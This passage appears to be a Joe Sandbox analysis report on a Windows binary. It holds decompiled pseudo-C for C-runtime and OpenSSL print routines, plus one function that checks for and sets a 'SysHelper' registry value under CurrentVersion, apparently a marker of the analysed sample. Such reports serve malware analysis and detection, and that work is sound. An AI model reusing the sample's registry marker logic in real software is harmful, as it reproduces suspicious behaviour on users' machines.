                                                                                                    															}
                                                                                                    															goto L49;
                                                                                                    														}
                                                                                                    													} else {
                                                                                                    														__eflags = _t83 & 0x00000003;
                                                                                                    														if((_t83 & 0x00000003) != 0) {
                                                                                                    															continue;
                                                                                                    														} else {
                                                                                                    															_t52 = _t58;
                                                                                                    															_t60 = _t58 >> 2;
                                                                                                    															__eflags = _t60;
                                                                                                    															if(_t60 != 0) {
                                                                                                    																goto L36;
                                                                                                    															} else {
                                                                                                    																goto L23;
                                                                                                    															}
                                                                                                    														}
                                                                                                    													}
                                                                                                    													goto L50;
                                                                                                    												}
                                                                                                    												goto L26;
                                                                                                    											} else {
                                                                                                    												_t60 = _t58 >> 2;
                                                                                                    												__eflags = _t60;
                                                                                                    												if(_t60 != 0) {
                                                                                                    													do {
                                                                                                    														L36:
                                                                                                    														_t47 =  *_t83 ^ 0xffffffff ^ 0x7efefeff +  *_t83;
                                                                                                    														_t66 =  *_t83;
                                                                                                    														_t83 = _t83 + 4;
                                                                                                    														__eflags = _t47 & 0x81010100;
                                                                                                    														if((_t47 & 0x81010100) == 0) {
                                                                                                    															goto L35;
                                                                                                    														} else {
                                                                                                    															__eflags = _t66;
                                                                                                    															if(_t66 == 0) {
                                                                                                    																__eflags = 0;
                                                                                                    																 *_t73 = 0;
                                                                                                    																goto L45;
                                                                                                    															} else {
                                                                                                    																__eflags = _t66;
                                                                                                    																if(_t66 == 0) {
                                                                                                    																	 *_t73 = _t66 & 0x000000ff;
                                                                                                    																	goto L45;
                                                                                                    																} else {
                                                                                                    																	__eflags = _t66 & 0x00ff0000;
                                                                                                    																	if((_t66 & 0x00ff0000) == 0) {
                                                                                                    																		 *_t73 = _t66 & 0x0000ffff;
                                                                                                    																		goto L45;
                                                                                                    																	} else {
                                                                                                    																		__eflags = _t66 & 0xff000000;
                                                                                                    																		if((_t66 & 0xff000000) != 0) {
                                                                                                    																			goto L35;
                                                                                                    																		} else {
                                                                                                    																			 *_t73 = _t66;
                                                                                                    																			L45:
                                                                                                    																			_t73 = _t73 + 4;
                                                                                                    																			_t42 = 0;
                                                                                                    																			_t59 = _t60 - 1;
                                                                                                    																			__eflags = _t59;
                                                                                                    																			if(_t59 != 0) {
                                                                                                    																				L46:
                                                                                                    																				_t42 = 0;
                                                                                                    																				__eflags = 0;
                                                                                                    																				do {
                                                                                                    																					 *_t73 = 0;
                                                                                                    																					_t73 = _t73 + 4;
                                                                                                    																					_t59 = _t59 - 1;
                                                                                                    																					__eflags = _t59;
                                                                                                    																				} while (_t59 != 0);
                                                                                                    																			}
                                                                                                    																			_t52 = _t52 & 0x00000003;
                                                                                                    																			__eflags = _t52;
                                                                                                    																			if(_t52 != 0) {
                                                                                                    																				goto L31;
                                                                                                    																			} else {
                                                                                                    																				L49:
                                                                                                    																				return _v60;
                                                                                                    																			}
                                                                                                    																		}
                                                                                                    																	}
                                                                                                    																}
                                                                                                    															}
                                                                                                    														}
                                                                                                    														goto L50;
                                                                                                    														L35:
                                                                                                    														 *_t73 = _t66;
                                                                                                    														_t73 = _t73 + 4;
                                                                                                    														_t60 = _t60 - 1;
                                                                                                    														__eflags = _t60;
                                                                                                    													} while (_t60 != 0);
                                                                                                    													L23:
                                                                                                    													_t52 = _t52 & 0x00000003;
                                                                                                    													__eflags = _t52;
                                                                                                    													if(_t52 == 0) {
                                                                                                    														goto L26;
                                                                                                    													} else {
                                                                                                    														goto L24;
                                                                                                    													}
                                                                                                    												} else {
                                                                                                    													while(1) {
                                                                                                    														L24:
                                                                                                    														_t42 =  *_t83;
                                                                                                    														_t83 = _t83 + 1;
                                                                                                    														 *_t73 = _t42;
                                                                                                    														_t73 = _t73 + 1;
                                                                                                    														__eflags = _t42;
                                                                                                    														if(_t42 == 0) {
                                                                                                    															break;
                                                                                                    														}
                                                                                                    														_t52 = _t52 - 1;
                                                                                                    														__eflags = _t52;
                                                                                                    														if(_t52 != 0) {
                                                                                                    															continue;
                                                                                                    														} else {
                                                                                                    															L26:
                                                                                                    															return _v60;
                                                                                                    														}
                                                                                                    														goto L50;
                                                                                                    													}
                                                                                                    													L32:
                                                                                                    													_t52 = _t52 - 1;
                                                                                                    													__eflags = _t52;
                                                                                                    													if(_t52 != 0) {
                                                                                                    														L31:
                                                                                                    														 *_t73 = _t42;
                                                                                                    														_t73 = _t73 + 1;
                                                                                                    														__eflags = _t73;
                                                                                                    														goto L32;
                                                                                                    													}
                                                                                                    													goto L34;
                                                                                                    												}
                                                                                                    											}
                                                                                                    										}
                                                                                                    									}
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								L10:
                                                                                                    								_t34 = E00425208(__eflags);
                                                                                                    								_t81 = 0x16;
                                                                                                    								 *_t34 = _t81;
                                                                                                    								E004242D2();
                                                                                                    								_t36 = _t81;
                                                                                                    								L11:
                                                                                                    								return _t36;
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							_t48 = _t79;
                                                                                                    							goto L5;
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						_t49 = E00428C96(0x86, 1);
                                                                                                    						 *(_t78 + 0x24) = _t49;
                                                                                                    						__eflags = _t49;
                                                                                                    						if(_t49 != 0) {
                                                                                                    							goto L7;
                                                                                                    						} else {
                                                                                                    							_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                                                    							L5:
                                                                                                    							goto L6;
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                                                    					L6:
                                                                                                    					return _t48;
                                                                                                    				}
                                                                                                    				L50:
                                                                                                    			}































                                                                                                    0x004c5d39
                                                                                                    0x004c5d3a
                                                                                                    0x004c5d42
                                                                                                    0x004c5d46
                                                                                                    0x004c5d4f
                                                                                                    0x004c5d58
                                                                                                    0x004c5d5b
                                                                                                    0x004c5d78
                                                                                                    0x004c5d7b
                                                                                                    0x004c5d86
                                                                                                    0x004c5d8e
                                                                                                    0x004c5d90
                                                                                                    0x004c5d96
                                                                                                    0x004c5d97
                                                                                                    0x004c5d98
                                                                                                    0x004c5d99
                                                                                                    0x004c5d9a
                                                                                                    0x004c5d9b
                                                                                                    0x004c5da0
                                                                                                    0x004c5da1
                                                                                                    0x004c5da4
                                                                                                    0x004c5da8
                                                                                                    0x004c5da9
                                                                                                    0x004c5dbf
                                                                                                    0x004c5dc2
                                                                                                    0x004c5dc4
                                                                                                    0x00000000
                                                                                                    0x004c5dc6
                                                                                                    0x004c5dc6
                                                                                                    0x004c5dd8
                                                                                                    0x004c5de0
                                                                                                    0x004c5de2
                                                                                                    0x00000000
                                                                                                    0x004c5de4
                                                                                                    0x004c5de6
                                                                                                    0x004c5de7
                                                                                                    0x004c5de8
                                                                                                    0x004c5de9
                                                                                                    0x004c5dea
                                                                                                    0x004c5deb
                                                                                                    0x004c5df0
                                                                                                    0x004c5df1
                                                                                                    0x004c5df2
                                                                                                    0x004c5df3
                                                                                                    0x004c5df4
                                                                                                    0x004c5df5
                                                                                                    0x004c5df6
                                                                                                    0x004c5df7
                                                                                                    0x004c5df8
                                                                                                    0x004c5df9
                                                                                                    0x004c5dfa
                                                                                                    0x004c5dfb
                                                                                                    0x004c5dfc
                                                                                                    0x004c5dfd
                                                                                                    0x004c5dfe
                                                                                                    0x004c5dff
                                                                                                    0x004c5e00
                                                                                                    0x004c5e04
                                                                                                    0x004c5e05
                                                                                                    0x004c5e07
                                                                                                    0x004c5e9f
                                                                                                    0x004c5ea4
                                                                                                    0x004c5e0d
                                                                                                    0x004c5e0d
                                                                                                    0x004c5e0e
                                                                                                    0x004c5e0f
                                                                                                    0x004c5e11
                                                                                                    0x004c5e15
                                                                                                    0x004c5e1b
                                                                                                    0x004c5e1f
                                                                                                    0x004c5e2c
                                                                                                    0x004c5e2c
                                                                                                    0x004c5e2e
                                                                                                    0x004c5e31
                                                                                                    0x004c5e33
                                                                                                    0x004c5e36
                                                                                                    0x004c5e36
                                                                                                    0x004c5e39
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004c5e3b
                                                                                                    0x004c5e3d
                                                                                                    0x004c5e6e
                                                                                                    0x004c5e74
                                                                                                    0x004c5e8c
                                                                                                    0x004c5e8c
                                                                                                    0x004c5e8e
                                                                                                    0x004c5e8e
                                                                                                    0x004c5e91
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004c5e76
                                                                                                    0x004c5e76
                                                                                                    0x004c5e76
                                                                                                    0x004c5e78
                                                                                                    0x004c5e7b
                                                                                                    0x004c5e7b
                                                                                                    0x004c5e7e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004c5e84
                                                                                                    0x004c5e8a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004c5e8a
                                                                                                    0x00000000
                                                                                                    0x004c5e76
                                                                                                    0x004c5e3f
                                                                                                    0x004c5e3f
                                                                                                    0x004c5e45
                                                                                                    0x00000000
                                                                                                    0x004c5e47
                                                                                                    0x004c5e47
                                                                                                    0x004c5e49
                                                                                                    0x004c5e49
                                                                                                    0x004c5e4c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004c5e4c
                                                                                                    0x004c5e45
                                                                                                    0x00000000
                                                                                                    0x004c5e3d
                                                                                                    0x00000000
                                                                                                    0x004c5e21
                                                                                                    0x004c5e21
                                                                                                    0x004c5e21
                                                                                                    0x004c5e24
                                                                                                    0x004c5eaf
                                                                                                    0x004c5eaf
                                                                                                    0x004c5ebb
                                                                                                    0x004c5ebd
                                                                                                    0x004c5ebf
                                                                                                    0x004c5ec2
                                                                                                    0x004c5ec7
                                                                                                    0x00000000
                                                                                                    0x004c5ec9
                                                                                                    0x004c5ec9
                                                                                                    0x004c5ecb
                                                                                                    0x004c5ef9
                                                                                                    0x004c5efb
                                                                                                    0x00000000
                                                                                                    0x004c5ecd
                                                                                                    0x004c5ecd
                                                                                                    0x004c5ecf
                                                                                                    0x004c5ef5
                                                                                                    0x00000000
                                                                                                    0x004c5ed1
                                                                                                    0x004c5ed1
                                                                                                    0x004c5ed7
                                                                                                    0x004c5eeb
                                                                                                    0x00000000
                                                                                                    0x004c5ed9
                                                                                                    0x004c5ed9
                                                                                                    0x004c5edf
                                                                                                    0x00000000
                                                                                                    0x004c5ee1
                                                                                                    0x004c5ee1
                                                                                                    0x004c5efd
                                                                                                    0x004c5efd
                                                                                                    0x004c5f00
                                                                                                    0x004c5f02
                                                                                                    0x004c5f02
                                                                                                    0x004c5f05
                                                                                                    0x004c5f07
                                                                                                    0x004c5f07
                                                                                                    0x004c5f07
                                                                                                    0x004c5f09
                                                                                                    0x004c5f09
                                                                                                    0x004c5f0b
                                                                                                    0x004c5f0e
                                                                                                    0x004c5f0e
                                                                                                    0x004c5f0e
                                                                                                    0x004c5f09
                                                                                                    0x004c5f13
                                                                                                    0x004c5f13
                                                                                                    0x004c5f16
                                                                                                    0x00000000
                                                                                                    0x004c5f1c
                                                                                                    0x004c5f1c
                                                                                                    0x004c5f23
                                                                                                    0x004c5f23
                                                                                                    0x004c5f16
                                                                                                    0x004c5edf
                                                                                                    0x004c5ed7
                                                                                                    0x004c5ecf
                                                                                                    0x004c5ecb
                                                                                                    0x00000000
                                                                                                    0x004c5ea5
                                                                                                    0x004c5ea5
                                                                                                    0x004c5ea7
                                                                                                    0x004c5eaa
                                                                                                    0x004c5eaa
                                                                                                    0x004c5eaa
                                                                                                    0x004c5e4e
                                                                                                    0x004c5e4e
                                                                                                    0x004c5e4e
                                                                                                    0x004c5e51
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004c5e2a
                                                                                                    0x004c5e53
                                                                                                    0x004c5e53
                                                                                                    0x004c5e53
                                                                                                    0x004c5e55
                                                                                                    0x004c5e58
                                                                                                    0x004c5e5a
                                                                                                    0x004c5e5d
                                                                                                    0x004c5e5f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004c5e61
                                                                                                    0x004c5e61
                                                                                                    0x004c5e64
                                                                                                    0x00000000
                                                                                                    0x004c5e66
                                                                                                    0x004c5e66
                                                                                                    0x004c5e6d
                                                                                                    0x004c5e6d
                                                                                                    0x00000000
                                                                                                    0x004c5e64
                                                                                                    0x004c5e98
                                                                                                    0x004c5e98
                                                                                                    0x004c5e98
                                                                                                    0x004c5e9b
                                                                                                    0x004c5e93
                                                                                                    0x004c5e93
                                                                                                    0x004c5e95
                                                                                                    0x004c5e95
                                                                                                    0x00000000
                                                                                                    0x004c5e95
                                                                                                    0x00000000
                                                                                                    0x004c5e9e
                                                                                                    0x004c5e24
                                                                                                    0x004c5e1f
                                                                                                    0x004c5e07
                                                                                                    0x004c5de2
                                                                                                    0x004c5dab
                                                                                                    0x004c5dab
                                                                                                    0x004c5dab
                                                                                                    0x004c5db2
                                                                                                    0x004c5db3
                                                                                                    0x004c5db5
                                                                                                    0x004c5dba
                                                                                                    0x004c5dbc
                                                                                                    0x004c5dbe
                                                                                                    0x004c5dbe
                                                                                                    0x004c5d92
                                                                                                    0x004c5d92
                                                                                                    0x00000000
                                                                                                    0x004c5d92
                                                                                                    0x004c5d5d
                                                                                                    0x004c5d60
                                                                                                    0x004c5d65
                                                                                                    0x004c5d6a
                                                                                                    0x004c5d6c
                                                                                                    0x00000000
                                                                                                    0x004c5d6e
                                                                                                    0x004c5d6e
                                                                                                    0x004c5d73
                                                                                                    0x00000000
                                                                                                    0x004c5d74
                                                                                                    0x004c5d6c
                                                                                                    0x004c5d48
                                                                                                    0x004c5d48
                                                                                                    0x004c5d75
                                                                                                    0x004c5d77
                                                                                                    0x004c5d77
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                      • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                      • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                      • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                      • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                      • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                    • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                    • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                    • __invoke_watson.LIBCMT ref: 004C5D9B
                                                                                                    • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                    • __invoke_watson.LIBCMT ref: 004C5DEB
                                                                                                    Strings
                                                                                                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
                                                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                    • API String ID: 2139067377-798102604
                                                                                                    • Opcode ID: 6565f3eeb2dc9c0597fd8b1228d76a5755e5e4a7eea90c3f78218ec856ed93f0
                                                                                                    • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                    • Opcode Fuzzy Hash: 6565f3eeb2dc9c0597fd8b1228d76a5755e5e4a7eea90c3f78218ec856ed93f0
                                                                                                    • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0040C6A0() {
                                                                                                    				void* _v8;
                                                                                                    				char _v12;
                                                                                                    				int _v16;
                                                                                                    				int _v20;
                                                                                                    				char _t16;
                                                                                                    
                                                                                                    				_v8 = 0;
                                                                                                    				_t16 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 0xf003f,  &_v8);
                                                                                                    				if(_t16 != 0) {
                                                                                                    					L4:
                                                                                                    					return 1;
                                                                                                    				} else {
                                                                                                    					_v12 = _t16;
                                                                                                    					_v20 = 4;
                                                                                                    					_v16 = 4;
                                                                                                    					if(RegQueryValueExW(_v8, L"SysHelper", 0,  &_v20,  &_v12,  &_v16) != 0) {
                                                                                                    						_v12 = 1;
                                                                                                    						RegSetValueExW(_v8, L"SysHelper", 0, 4,  &_v12, 4);
                                                                                                    						RegCloseKey(_v8);
                                                                                                    						goto L4;
                                                                                                    					} else {
                                                                                                    						RegCloseKey(_v8);
                                                                                                    						return 0;
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}








                                                                                                    0x0040c6a9
                                                                                                    0x0040c6c2
                                                                                                    0x0040c6ca
                                                                                                    0x0040c734
                                                                                                    0x0040c739
                                                                                                    0x0040c6cc
                                                                                                    0x0040c6cc
                                                                                                    0x0040c6d6
                                                                                                    0x0040c6e1
                                                                                                    0x0040c6fb
                                                                                                    0x0040c711
                                                                                                    0x0040c725
                                                                                                    0x0040c72e
                                                                                                    0x00000000
                                                                                                    0x0040c6fd
                                                                                                    0x0040c700
                                                                                                    0x0040c70b
                                                                                                    0x0040c70b
                                                                                                    0x0040c6fb

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                    • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseValue$OpenQuery
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                    • API String ID: 3962714758-1667468722
                                                                                                    • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                    • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                    • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                    • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 88%
                                                                                                    			E004573F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, char _a28, signed int _a60, intOrPtr _a68, char _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, intOrPtr _a92, signed int _a96, intOrPtr _a100, signed char _a104) {
                                                                                                    				signed int _v0;
                                                                                                    				signed int _v4;
                                                                                                    				intOrPtr _v8;
                                                                                                    				char _v16;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				signed int _t129;
                                                                                                    				intOrPtr _t135;
                                                                                                    				signed int _t136;
                                                                                                    				signed int _t140;
                                                                                                    				void* _t141;
                                                                                                    				signed int _t143;
                                                                                                    				signed int _t148;
                                                                                                    				void* _t150;
                                                                                                    				intOrPtr _t154;
                                                                                                    				signed char _t160;
                                                                                                    				char _t166;
                                                                                                    				intOrPtr _t170;
                                                                                                    				signed int _t174;
                                                                                                    				signed int _t181;
                                                                                                    				signed int* _t182;
                                                                                                    				intOrPtr _t184;
                                                                                                    				intOrPtr _t185;
                                                                                                    				void* _t186;
                                                                                                    				intOrPtr _t187;
                                                                                                    				signed char _t189;
                                                                                                    				signed int _t192;
                                                                                                    				signed int* _t196;
                                                                                                    				signed int _t199;
                                                                                                    				intOrPtr* _t200;
                                                                                                    				signed int _t203;
                                                                                                    				signed int _t205;
                                                                                                    				signed int _t206;
                                                                                                    				void* _t208;
                                                                                                    				intOrPtr _t209;
                                                                                                    				signed int _t213;
                                                                                                    				intOrPtr _t214;
                                                                                                    				intOrPtr* _t217;
                                                                                                    				signed int _t220;
                                                                                                    				signed int _t221;
                                                                                                    				void* _t223;
                                                                                                    				signed int _t224;
                                                                                                    				signed int _t225;
                                                                                                    				signed int _t226;
                                                                                                    				signed int _t231;
                                                                                                    				intOrPtr* _t232;
                                                                                                    				signed int* _t233;
                                                                                                    				void* _t235;
                                                                                                    				signed int _t240;
                                                                                                    				void* _t241;
                                                                                                    				signed int _t242;
                                                                                                    				signed int _t243;
                                                                                                    				signed int _t244;
                                                                                                    				signed int _t245;
                                                                                                    				intOrPtr _t249;
                                                                                                    				intOrPtr _t250;
                                                                                                    				signed int _t253;
                                                                                                    				signed int _t257;
                                                                                                    				void* _t262;
                                                                                                    				signed char _t268;
                                                                                                    
                                                                                                    				E0042F7C0(0x40);
                                                                                                    				_t129 =  *0x50ad20; // 0x2cb5b44c
                                                                                                    				_a60 = _t129 ^ _t253;
                                                                                                    				_t187 = _a100;
                                                                                                    				_t181 = _a84;
                                                                                                    				_t249 = _a68;
                                                                                                    				_a28 = _a72;
                                                                                                    				_a8 = _a76;
                                                                                                    				_v0 = _a80;
                                                                                                    				_t220 = 0;
                                                                                                    				_a4 = 0x4ffca4;
                                                                                                    				_a12 = 0;
                                                                                                    				_t188 =  <  ? 0 : _t187;
                                                                                                    				_t213 = _a88;
                                                                                                    				_a100 =  <  ? 0 : _t187;
                                                                                                    				_t189 = _a104;
                                                                                                    				if((_t189 & 0x00000040) == 0) {
                                                                                                    					_t257 = _t213;
                                                                                                    					if(_t257 > 0 || _t257 >= 0 && _t181 >= 0) {
                                                                                                    						__eflags = _t189 & 0x00000002;
                                                                                                    						if((_t189 & 0x00000002) == 0) {
                                                                                                    							__eflags = _t189 & 0x00000004;
                                                                                                    							_a16 = 0x20;
                                                                                                    							_t179 =  !=  ? _a16 : 0;
                                                                                                    							_a12 =  !=  ? _a16 : 0;
                                                                                                    						} else {
                                                                                                    							_a12 = 0x2b;
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						_t181 =  ~_t181;
                                                                                                    						_a12 = 0x2d;
                                                                                                    						asm("adc edx, eax");
                                                                                                    						_t213 =  ~_t213;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_t135 = _a92;
                                                                                                    				if((_t189 & 0x00000008) != 0) {
                                                                                                    					if(_t135 != 8) {
                                                                                                    						__eflags = _a92 - 0x10;
                                                                                                    						_t178 =  !=  ? 0x4ffca4 : "0x";
                                                                                                    						_a4 =  !=  ? 0x4ffca4 : "0x";
                                                                                                    						_t135 = _a92;
                                                                                                    					} else {
                                                                                                    						_a4 = "0";
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_a16 = "0123456789abcdef";
                                                                                                    				_t230 =  !=  ? 1 : _t220;
                                                                                                    				_t262 =  !=  ? 1 : _t220;
                                                                                                    				_t192 =  ==  ? _a16 : "0123456789ABCDEF";
                                                                                                    				_t231 = _t192;
                                                                                                    				while(1) {
                                                                                                    					_t136 = E0043AE20(_t181, _t213, _t135, 0);
                                                                                                    					_a4 = _t181;
                                                                                                    					_t181 = _t136;
                                                                                                    					 *((char*)(_t253 + _t220 + 0x30)) =  *((intOrPtr*)(_t192 + _t231));
                                                                                                    					_t220 = _t220 + 1;
                                                                                                    					_t192 = _t181 | _t213;
                                                                                                    					if(_t192 == 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					_t135 = _a92;
                                                                                                    					if(_t220 < 0x1a) {
                                                                                                    						continue;
                                                                                                    					}
                                                                                                    					break;
                                                                                                    				}
                                                                                                    				_t232 = _a4;
                                                                                                    				_a16 = _t220;
                                                                                                    				if(_t220 != 0x1a) {
                                                                                                    					if(__eflags >= 0) {
                                                                                                    						E0042AC83();
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						asm("int3");
                                                                                                    						E0042F7C0(4);
                                                                                                    						_t140 = _a8;
                                                                                                    						_t214 = 0;
                                                                                                    						__eflags = _t140;
                                                                                                    						_v16 = 0;
                                                                                                    						_t196 =  !=  ? _t140 : "<NULL>";
                                                                                                    						_t141 = 0;
                                                                                                    						_a8 = _t196;
                                                                                                    						__eflags =  *_t196;
                                                                                                    						if( *_t196 != 0) {
                                                                                                    							do {
                                                                                                    								_t141 = _t141 + 1;
                                                                                                    								__eflags =  *(_t141 + _t196);
                                                                                                    							} while ( *(_t141 + _t196) != 0);
                                                                                                    						}
                                                                                                    						_t199 =  <  ? _t214 : _a16 - _t141;
                                                                                                    						__eflags = _a12 & 0x00000001;
                                                                                                    						_a16 = _t199;
                                                                                                    						if((_a12 & 0x00000001) != 0) {
                                                                                                    							_t199 =  ~_t199;
                                                                                                    							_a16 = _t199;
                                                                                                    						}
                                                                                                    						_push(_t181);
                                                                                                    						_t182 = _v0;
                                                                                                    						_push(_t249);
                                                                                                    						_t250 = _v8;
                                                                                                    						_push(_t232);
                                                                                                    						_t233 = _a4;
                                                                                                    						_push(_t220);
                                                                                                    						_t221 = _v4;
                                                                                                    						__eflags = _t199;
                                                                                                    						if(_t199 > 0) {
                                                                                                    							while(1) {
                                                                                                    								__eflags = _t214 - _a20;
                                                                                                    								if(_t214 >= _a20) {
                                                                                                    									goto L71;
                                                                                                    								}
                                                                                                    								__eflags = _t221;
                                                                                                    								if(_t221 != 0) {
                                                                                                    									__eflags =  *_t182 -  *_t233;
                                                                                                    									if( *_t182 >=  *_t233) {
                                                                                                    										do {
                                                                                                    											__eflags =  *_t221;
                                                                                                    											if( *_t221 != 0) {
                                                                                                    												 *_t233 =  *_t233 + 0x400;
                                                                                                    												__eflags =  *_t233;
                                                                                                    												_t150 = E00454F30( *_t221,  *_t233, ".\\crypto\\bio\\b_print.c", 0x2ed);
                                                                                                    												_t253 = _t253 + 0x10;
                                                                                                    												 *_t221 = _t150;
                                                                                                    											} else {
                                                                                                    												__eflags =  *_t233;
                                                                                                    												if( *_t233 == 0) {
                                                                                                    													 *_t233 = 0x400;
                                                                                                    												}
                                                                                                    												 *_t221 = E00454E50( *_t233, ".\\crypto\\bio\\b_print.c", 0x2e5);
                                                                                                    												_t253 = _t253 + 0xc;
                                                                                                    												_t206 =  *_t182;
                                                                                                    												__eflags = _t206;
                                                                                                    												if(_t206 != 0) {
                                                                                                    													E0042D8D0(_t152, _v0, _t206);
                                                                                                    													_t253 = _t253 + 0xc;
                                                                                                    												}
                                                                                                    												_v0 = 0;
                                                                                                    											}
                                                                                                    											__eflags =  *_t182 -  *_t233;
                                                                                                    										} while ( *_t182 >=  *_t233);
                                                                                                    										_t214 = _v16;
                                                                                                    									}
                                                                                                    								}
                                                                                                    								_t203 =  *_t182;
                                                                                                    								__eflags = _t203 -  *_t233;
                                                                                                    								if(_t203 <  *_t233) {
                                                                                                    									_t148 = _v0;
                                                                                                    									__eflags = _t148;
                                                                                                    									if(_t148 == 0) {
                                                                                                    										 *((char*)(_t203 +  *_t221)) = 0x20;
                                                                                                    									} else {
                                                                                                    										 *((char*)(_t148 + _t203)) = 0x20;
                                                                                                    									}
                                                                                                    									 *_t182 =  *_t182 + 1;
                                                                                                    									__eflags =  *_t182;
                                                                                                    								}
                                                                                                    								_t214 = _t214 + 1;
                                                                                                    								_t205 = _a16 - 1;
                                                                                                    								_v16 = _t214;
                                                                                                    								_a16 = _t205;
                                                                                                    								__eflags = _t205;
                                                                                                    								if(_t205 > 0) {
                                                                                                    									continue;
                                                                                                    								}
                                                                                                    								goto L71;
                                                                                                    							}
                                                                                                    						}
                                                                                                    						L71:
                                                                                                    						_t200 = _a8;
                                                                                                    						_t143 =  *_t200;
                                                                                                    						__eflags = _t143;
                                                                                                    						if(_t143 != 0) {
                                                                                                    							_a8 = _t200 - _t214;
                                                                                                    							while(1) {
                                                                                                    								__eflags = _t214 - _a20;
                                                                                                    								if(_t214 >= _a20) {
                                                                                                    									goto L75;
                                                                                                    								}
                                                                                                    								E00456F70(_t250, _t221, _t182, _t233, _t143);
                                                                                                    								_t253 = _t253 + 0x14;
